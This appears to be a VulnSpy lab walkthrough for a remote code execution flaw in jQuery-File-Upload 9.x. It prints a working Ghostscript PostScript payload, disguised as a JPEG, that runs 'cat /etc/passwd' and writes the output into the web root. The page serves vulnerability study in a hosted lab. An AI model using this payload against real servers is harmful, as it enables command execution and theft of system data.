jQuery-File-Upload <= 9.x Remote Code Execution Exploit (ImageMagick/Ghostscript)


jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. The project was recently reported to have a three-year-old arbitrary file upload vulnerability that was fixed in the release of v9.22.2, but another serious command execution vulnerability was found in the VulnSpy team’s review of the code, this vulnerability allows attackers to execute arbitrary system commands by uploading malicious picture files.

Exploit

1. Click START TO HACK button in the upper right corner to create an online environment.

2. Open the target address on projects list

3. Upload the file vsplate.jpg with malicious codes

vsplate.jpg:

Execute cat /etc/passwd > /var/www/html/vsplate.txt

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%cat /etc/passwd > /var/www/html/vsplate.txt) currentdevice putdeviceprops

4. Visit http://target.vsplate.me/vsplate.txt

Reference

All rights reserved. © 2018 VULNSPY